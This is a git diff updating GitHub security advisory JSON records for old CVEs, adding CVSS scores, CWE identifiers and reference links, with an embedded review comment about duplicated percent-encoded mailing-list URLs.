@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5337-f6v6-75gf", - "modified": "2022-04-29T03:00:33Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-29T03:00:33Z", "aliases": [ "CVE-2004-1967" ], "details": "Cross-site request forgery (CSRF) vulnerabilities in (1) cp_forums.php, (2) cp_usergroup.php, (3) cp_ipbans.php, (4) myhome.php, (5) post.php, or (6) moderator.php in Open Bulletin Board (OpenBB) 1.0.6 and earlier allow remote attackers to execute arbitrary code by including the code in an image tag or a link.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-352" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-55c6-r3wh-x7cj/GHSA-55c6-r3wh-x7cj.json b/advisories/unreviewed/2022/04/GHSA-55c6-r3wh-x7cj/GHSA-55c6-r3wh-x7cj.json index 95f0078d7e38e..71d026c81134a 100644 --- a/advisories/unreviewed/2022/04/GHSA-55c6-r3wh-x7cj/GHSA-55c6-r3wh-x7cj.json +++ b/advisories/unreviewed/2022/04/GHSA-55c6-r3wh-x7cj/GHSA-55c6-r3wh-x7cj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-55c6-r3wh-x7cj", - "modified": "2022-04-30T18:13:50Z", + "modified": "2024-02-08T21:30:28Z", "published": "2022-04-30T18:13:50Z", "aliases": [ "CVE-2000-0552" ], "details": "ICQwebmail client for ICQ 2000A creates a world readable temporary file during login and does not delete it, which allows local users to obtain sensitive information.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "LOW", "github_reviewed": false, 
diff --git a/advisories/unreviewed/2022/04/GHSA-5fxq-3r3p-42m4/GHSA-5fxq-3r3p-42m4.json b/advisories/unreviewed/2022/04/GHSA-5fxq-3r3p-42m4/GHSA-5fxq-3r3p-42m4.json index 65f582ddec648..49a101edf6d45 100644 --- a/advisories/unreviewed/2022/04/GHSA-5fxq-3r3p-42m4/GHSA-5fxq-3r3p-42m4.json +++ b/advisories/unreviewed/2022/04/GHSA-5fxq-3r3p-42m4/GHSA-5fxq-3r3p-42m4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5fxq-3r3p-42m4", - "modified": "2022-04-30T18:13:26Z", + "modified": "2024-02-08T21:30:28Z", "published": "2022-04-30T18:13:26Z", "aliases": [ "CVE-2000-0338" ], "details": "Concurrent Versions Software (CVS) uses predictable temporary file names for locking, which allows local users to cause a denial of service by creating the lock directory before it is created for use by a legitimate CVS user.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-667" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-5j4q-p8r9-g32c/GHSA-5j4q-p8r9-g32c.json b/advisories/unreviewed/2022/04/GHSA-5j4q-p8r9-g32c/GHSA-5j4q-p8r9-g32c.json index cd0dc43ca543c..727cf0f8f43ae 100644 --- a/advisories/unreviewed/2022/04/GHSA-5j4q-p8r9-g32c/GHSA-5j4q-p8r9-g32c.json +++ b/advisories/unreviewed/2022/04/GHSA-5j4q-p8r9-g32c/GHSA-5j4q-p8r9-g32c.json 
@@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26359" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5117" diff --git a/advisories/unreviewed/2022/04/GHSA-64cj-w4v7-5f35/GHSA-64cj-w4v7-5f35.json b/advisories/unreviewed/2022/04/GHSA-64cj-w4v7-5f35/GHSA-64cj-w4v7-5f35.json index 721ddd9be6ae6..e97438eb3928b 100644 --- a/advisories/unreviewed/2022/04/GHSA-64cj-w4v7-5f35/GHSA-64cj-w4v7-5f35.json +++ b/advisories/unreviewed/2022/04/GHSA-64cj-w4v7-5f35/GHSA-64cj-w4v7-5f35.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-64cj-w4v7-5f35", - "modified": "2022-04-30T18:22:28Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-30T18:22:28Z", "aliases": [ "CVE-2002-2070" ], "details": "SecureClean 3 build 2.0 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "MODERATE", "github_reviewed": false, 
diff --git a/advisories/unreviewed/2022/04/GHSA-69rx-rcww-qf58/GHSA-69rx-rcww-qf58.json b/advisories/unreviewed/2022/04/GHSA-69rx-rcww-qf58/GHSA-69rx-rcww-qf58.json index d9c65ed842225..11b6e412da83c 100644 --- a/advisories/unreviewed/2022/04/GHSA-69rx-rcww-qf58/GHSA-69rx-rcww-qf58.json +++ b/advisories/unreviewed/2022/04/GHSA-69rx-rcww-qf58/GHSA-69rx-rcww-qf58.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-69rx-rcww-qf58", - "modified": "2022-04-29T01:26:06Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-29T01:26:06Z", "aliases": [ "CVE-2003-0252" ], "details": "Off-by-one error in the xlog function of mountd in the Linux NFS utils package (nfs-utils) before 1.0.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via certain RPC requests to mountd that do not contain newlines.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -97,7 +100,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-193" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-6fwh-897j-m5cj/GHSA-6fwh-897j-m5cj.json b/advisories/unreviewed/2022/04/GHSA-6fwh-897j-m5cj/GHSA-6fwh-897j-m5cj.json index b2f8a49e8ef3b..ca8682808ebc2 100644 --- a/advisories/unreviewed/2022/04/GHSA-6fwh-897j-m5cj/GHSA-6fwh-897j-m5cj.json +++ b/advisories/unreviewed/2022/04/GHSA-6fwh-897j-m5cj/GHSA-6fwh-897j-m5cj.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6fwh-897j-m5cj", - "modified": "2022-04-30T18:21:42Z", + "modified": "2024-02-08T21:30:29Z", "published": "2022-04-30T18:21:42Z", "aliases": [ "CVE-2002-1706" ], "details": "Cisco IOS software 11.3 through 12.2 running on Cisco uBR7200 and uBR7100 series Universal Broadband Routers allows remote attackers to modify Data Over Cable Service Interface Specification (DOCSIS) settings via a DOCSIS file without a Message Integrity Check (MIC) signature, which is approved by the router.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-347" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-6m44-c224-92xx/GHSA-6m44-c224-92xx.json b/advisories/unreviewed/2022/04/GHSA-6m44-c224-92xx/GHSA-6m44-c224-92xx.json index 3cd1b555d06e3..003df624ec28a 100644 --- a/advisories/unreviewed/2022/04/GHSA-6m44-c224-92xx/GHSA-6m44-c224-92xx.json +++ b/advisories/unreviewed/2022/04/GHSA-6m44-c224-92xx/GHSA-6m44-c224-92xx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6m44-c224-92xx", - "modified": "2022-04-30T18:15:42Z", + "modified": "2024-02-02T03:30:27Z", "published": "2022-04-30T18:15:42Z", "aliases": [ "CVE-2001-0248" ], "details": "Buffer overflow in FTP server in HPUX 11 allows remote attackers to execute arbitrary commands by creating a long pathname and calling the STAT command, which uses glob to generate long strings.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-131" ], "severity": "HIGH", "github_reviewed": false, 
diff --git a/advisories/unreviewed/2022/04/GHSA-6wfm-7hqx-39wg/GHSA-6wfm-7hqx-39wg.json b/advisories/unreviewed/2022/04/GHSA-6wfm-7hqx-39wg/GHSA-6wfm-7hqx-39wg.json index edc519d41ecd7..79c9fdfd6857a 100644 --- a/advisories/unreviewed/2022/04/GHSA-6wfm-7hqx-39wg/GHSA-6wfm-7hqx-39wg.json +++ b/advisories/unreviewed/2022/04/GHSA-6wfm-7hqx-39wg/GHSA-6wfm-7hqx-39wg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6wfm-7hqx-39wg", - "modified": "2022-04-29T01:28:19Z", + "modified": "2024-02-02T15:30:25Z", "published": "2022-04-29T01:28:19Z", "aliases": [ "CVE-2003-1564" ], "details": "libxml2, possibly before 2.5.0, does not properly detect recursion during entity expansion, which allows context-dependent attackers to cause a denial of service (memory and CPU consumption) via a crafted XML document containing a large number of nested entity references, aka the \"billion laughs attack.\"", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-776" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-746g-hg8c-j9cg/GHSA-746g-hg8c-j9cg.json b/advisories/unreviewed/2022/04/GHSA-746g-hg8c-j9cg/GHSA-746g-hg8c-j9cg.json index 0f1ae81c3ea6c..c3bf43189f76e 100644 --- a/advisories/unreviewed/2022/04/GHSA-746g-hg8c-j9cg/GHSA-746g-hg8c-j9cg.json +++ b/advisories/unreviewed/2022/04/GHSA-746g-hg8c-j9cg/GHSA-746g-hg8c-j9cg.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-746g-hg8c-j9cg", - "modified": "2022-04-30T18:15:41Z", + "modified": "2024-02-02T03:30:27Z", "published": "2022-04-30T18:15:41Z", "aliases": [ "CVE-2001-0249" ], "details": "Heap overflow in FTP daemon in Solaris 8 allows remote attackers to execute arbitrary commands by creating a long pathname and calling the LIST command, which uses glob to generate long strings.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-131" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-7hcc-g6hm-h786/GHSA-7hcc-g6hm-h786.json b/advisories/unreviewed/2022/04/GHSA-7hcc-g6hm-h786/GHSA-7hcc-g6hm-h786.json index 1c484628ceb98..4aa047a9db7f7 100644 --- a/advisories/unreviewed/2022/04/GHSA-7hcc-g6hm-h786/GHSA-7hcc-g6hm-h786.json +++ b/advisories/unreviewed/2022/04/GHSA-7hcc-g6hm-h786/GHSA-7hcc-g6hm-h786.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7hcc-g6hm-h786", - "modified": "2022-04-30T18:17:56Z", + "modified": "2024-02-02T03:30:27Z", "published": "2022-04-30T18:17:56Z", "aliases": [ "CVE-2001-1391" ], "details": "Off-by-one vulnerability in CPIA driver of Linux kernel before 2.2.19 allows users to modify kernel memory.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -65,7 +68,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-193" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-7rhp-mjch-qq88/GHSA-7rhp-mjch-qq88.json b/advisories/unreviewed/2022/04/GHSA-7rhp-mjch-qq88/GHSA-7rhp-mjch-qq88.json index 4a229870c7000..ad7662d926ecb 100644 --- a/advisories/unreviewed/2022/04/GHSA-7rhp-mjch-qq88/GHSA-7rhp-mjch-qq88.json +++ b/advisories/unreviewed/2022/04/GHSA-7rhp-mjch-qq88/GHSA-7rhp-mjch-qq88.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7rhp-mjch-qq88", - "modified": "2022-04-30T18:17:25Z", + "modified": "2024-02-08T03:32:42Z", "published": "2022-04-30T18:17:25Z", "aliases": [ "CVE-2001-1125" ], "details": "Symantec LiveUpdate before 1.6 does not use cryptography to ensure the integrity of download files, which allows remote attackers to execute arbitrary code via DNS spoofing of the update.symantec.com site.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-494" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-832g-rwmf-rc6m/GHSA-832g-rwmf-rc6m.json b/advisories/unreviewed/2022/04/GHSA-832g-rwmf-rc6m/GHSA-832g-rwmf-rc6m.json index b2ee8b28d6c16..10632c4ad9ce4 100644 --- a/advisories/unreviewed/2022/04/GHSA-832g-rwmf-rc6m/GHSA-832g-rwmf-rc6m.json +++ b/advisories/unreviewed/2022/04/GHSA-832g-rwmf-rc6m/GHSA-832g-rwmf-rc6m.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-832g-rwmf-rc6m", - "modified": "2022-04-30T18:17:14Z", + "modified": "2024-02-02T03:30:28Z", "published": "2022-04-30T18:17:14Z", "aliases": [ "CVE-2001-1043" ], "details": "ArGoSoft FTP Server 1.2.2.2 allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-875x-x5q8-g85f/GHSA-875x-x5q8-g85f.json b/advisories/unreviewed/2022/04/GHSA-875x-x5q8-g85f/GHSA-875x-x5q8-g85f.json index 08603b75d2fc3..e2bfd64840fa5 100644 --- a/advisories/unreviewed/2022/04/GHSA-875x-x5q8-g85f/GHSA-875x-x5q8-g85f.json 
+++ b/advisories/unreviewed/2022/04/GHSA-875x-x5q8-g85f/GHSA-875x-x5q8-g85f.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-875x-x5q8-g85f", - "modified": "2022-04-30T18:22:26Z", + "modified": "2024-02-08T21:30:29Z", "published": "2022-04-30T18:22:26Z", "aliases": [ "CVE-2002-2066" ], "details": "BestCrypt BCWipe 1.0.7 and 2.0 through 2.35.1 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-885f-x463-v454/GHSA-885f-x463-v454.json b/advisories/unreviewed/2022/04/GHSA-885f-x463-v454/GHSA-885f-x463-v454.json index 1f882cede7686..a1a2696d35aa1 100644 --- a/advisories/unreviewed/2022/04/GHSA-885f-x463-v454/GHSA-885f-x463-v454.json +++ b/advisories/unreviewed/2022/04/GHSA-885f-x463-v454/GHSA-885f-x463-v454.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-885f-x463-v454", - "modified": "2022-04-30T18:13:26Z", + "modified": "2024-02-02T03:30:27Z", "published": "2022-04-30T18:13:26Z", "aliases": [ "CVE-2000-0342" ], "details": "Eudora 4.x allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka \"Stealth Attachment.\"", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], "severity": "MODERATE", "github_reviewed": false, 
diff --git a/advisories/unreviewed/2022/04/GHSA-899x-jhm8-pc3m/GHSA-899x-jhm8-pc3m.json b/advisories/unreviewed/2022/04/GHSA-899x-jhm8-pc3m/GHSA-899x-jhm8-pc3m.json index 9c7cd0418c643..06119d3f84faf 100644 --- a/advisories/unreviewed/2022/04/GHSA-899x-jhm8-pc3m/GHSA-899x-jhm8-pc3m.json +++ b/advisories/unreviewed/2022/04/GHSA-899x-jhm8-pc3m/GHSA-899x-jhm8-pc3m.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-899x-jhm8-pc3m", - "modified": "2022-04-29T02:57:34Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-29T02:57:34Z", "aliases": [ "CVE-2004-0346" ], "details": "Off-by-one buffer overflow in _xlate_ascii_write() in ProFTPD 1.2.7 through 1.2.9rc2p allows local users to gain privileges via a 1024 byte RETR command.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-193" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-8ffw-58mq-48w9/GHSA-8ffw-58mq-48w9.json b/advisories/unreviewed/2022/04/GHSA-8ffw-58mq-48w9/GHSA-8ffw-58mq-48w9.json index 18796572f646a..a4ecf9584d456 100644 --- a/advisories/unreviewed/2022/04/GHSA-8ffw-58mq-48w9/GHSA-8ffw-58mq-48w9.json +++ b/advisories/unreviewed/2022/04/GHSA-8ffw-58mq-48w9/GHSA-8ffw-58mq-48w9.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8ffw-58mq-48w9", - "modified": "2022-04-29T01:26:22Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-29T01:26:22Z", "aliases": [ "CVE-2003-0411" ], "details": "Sun ONE Application Server 7.0 for Windows 2000/XP allows remote attackers to obtain JSP source code via a request that uses the uppercase \".JSP\" extension instead of the lowercase .jsp extension.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ 
@@ -49,7 +52,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-178"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-8hcc-583p-2372/GHSA-8hcc-583p-2372.json b/advisories/unreviewed/2022/04/GHSA-8hcc-583p-2372/GHSA-8hcc-583p-2372.json
index 49340509bf896..5de1f8b62c01d 100644
--- a/advisories/unreviewed/2022/04/GHSA-8hcc-583p-2372/GHSA-8hcc-583p-2372.json
+++ b/advisories/unreviewed/2022/04/GHSA-8hcc-583p-2372/GHSA-8hcc-583p-2372.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-8hcc-583p-2372",
- "modified": "2022-04-29T03:00:40Z",
+ "modified": "2024-02-08T18:30:37Z",
 "published": "2022-04-29T03:00:40Z",
 "aliases": [
 "CVE-2004-2013"
 ],
 "details": "Integer overflow in the SCTP_SOCKOPT_DEBUG_NAME SCTP socket option in socket.c in the Linux kernel 2.4.25 and earlier allows local users to execute arbitrary code via an optlen value of -1, which causes kmalloc to allocate 0 bytes of memory.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -41,7 +44,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-190"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-8rc7-gfvj-2hjx/GHSA-8rc7-gfvj-2hjx.json b/advisories/unreviewed/2022/04/GHSA-8rc7-gfvj-2hjx/GHSA-8rc7-gfvj-2hjx.json
index 27e0f6fd7d4d7..589f023887ae3 100644
--- a/advisories/unreviewed/2022/04/GHSA-8rc7-gfvj-2hjx/GHSA-8rc7-gfvj-2hjx.json
+++ b/advisories/unreviewed/2022/04/GHSA-8rc7-gfvj-2hjx/GHSA-8rc7-gfvj-2hjx.json
@@ -21,6 +21,14 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26358"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/"
@@ -29,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-07"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2022/dsa-5117"
diff --git a/advisories/unreviewed/2022/04/GHSA-8wgq-vhc2-3cqc/GHSA-8wgq-vhc2-3cqc.json b/advisories/unreviewed/2022/04/GHSA-8wgq-vhc2-3cqc/GHSA-8wgq-vhc2-3cqc.json
index be342c168d5e5..32a142942fd4c 100644
--- a/advisories/unreviewed/2022/04/GHSA-8wgq-vhc2-3cqc/GHSA-8wgq-vhc2-3cqc.json
+++ b/advisories/unreviewed/2022/04/GHSA-8wgq-vhc2-3cqc/GHSA-8wgq-vhc2-3cqc.json
@@ -41,7 +41,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-78"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-8xp9-99h5-4vcg/GHSA-8xp9-99h5-4vcg.json b/advisories/unreviewed/2022/04/GHSA-8xp9-99h5-4vcg/GHSA-8xp9-99h5-4vcg.json
deleted file mode 100644
index c1d57d9f2bd24..0000000000000
--- a/advisories/unreviewed/2022/04/GHSA-8xp9-99h5-4vcg/GHSA-8xp9-99h5-4vcg.json
+++ /dev/null
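Review bot: The two references added in the first hunk of GHSA-8rc7-gfvj-2hjx are the existing Fedora announce-list entries with the `@` in the path percent-encoded — `package-announce%40lists.fedoraproject.org` versus the unchanged `package-announce@lists.fedoraproject.org` three lines below — so the file now lists each message twice for any consumer that compares reference URLs as strings. The same pattern repeats in GHSA-c3mw-fh2q-7xx4 (the same two Fedora URLs) and, as `%40%3C` beside `@%3C` on the lists.apache.org thread URLs, in GHSA-9q6c-grq3-7prg and GHSA-cx2h-jfxr-vw9c, where every one of the added entries shadows an existing one. Both spellings presumably reach the same page, so the importer should compare references after percent-decoding the path before appending, or these entries should be dropped rather than merged. The Gentoo GLSA reference added in the second hunk is a genuinely new link and is fine as is.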
@@ -1,43 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-8xp9-99h5-4vcg",
- "modified": "2022-04-21T01:57:47Z",
- "published": "2022-04-21T01:57:47Z",
- "aliases": [
- "CVE-2010-3664"
- ],
- "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows Information Disclosure on the backend.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3664"
- },
- {
- "type": "WEB",
- "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719"
- },
- {
- "type": "WEB",
- "url": "https://security-tracker.debian.org/tracker/CVE-2010-3664"
- },
- {
- "type": "WEB",
- "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Information_Disclosure"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-11-04T22:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/04/GHSA-9c7h-3j4x-5hw6/GHSA-9c7h-3j4x-5hw6.json b/advisories/unreviewed/2022/04/GHSA-9c7h-3j4x-5hw6/GHSA-9c7h-3j4x-5hw6.json
index 6897651dc287a..aa10a488c436a 100644
--- a/advisories/unreviewed/2022/04/GHSA-9c7h-3j4x-5hw6/GHSA-9c7h-3j4x-5hw6.json
+++ b/advisories/unreviewed/2022/04/GHSA-9c7h-3j4x-5hw6/GHSA-9c7h-3j4x-5hw6.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9c7h-3j4x-5hw6",
- "modified": "2022-04-29T01:27:25Z",
+ "modified": "2024-02-02T15:30:25Z",
 "published": "2022-04-29T01:27:25Z",
 "aliases": [
 "CVE-2003-1048"
 ],
 "details": "Double free vulnerability in mshtml.dll for certain versions of Internet Explorer 6.x allows remote attackers to cause a denial of service (application crash) via a malformed GIF image.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -85,7 +88,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-119"
+ "CWE-119",
+ "CWE-415"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-9q6c-grq3-7prg/GHSA-9q6c-grq3-7prg.json b/advisories/unreviewed/2022/04/GHSA-9q6c-grq3-7prg/GHSA-9q6c-grq3-7prg.json
index ce345071280ce..c0052506f47f8 100644
--- a/advisories/unreviewed/2022/04/GHSA-9q6c-grq3-7prg/GHSA-9q6c-grq3-7prg.json
+++ b/advisories/unreviewed/2022/04/GHSA-9q6c-grq3-7prg/GHSA-9q6c-grq3-7prg.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9q6c-grq3-7prg",
- "modified": "2022-04-29T02:58:17Z",
+ "modified": "2024-02-02T15:30:26Z",
 "published": "2022-04-29T02:58:17Z",
 "aliases": [
 "CVE-2004-0747"
 ],
 "details": "Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -22,54 +25,106 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17384" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": 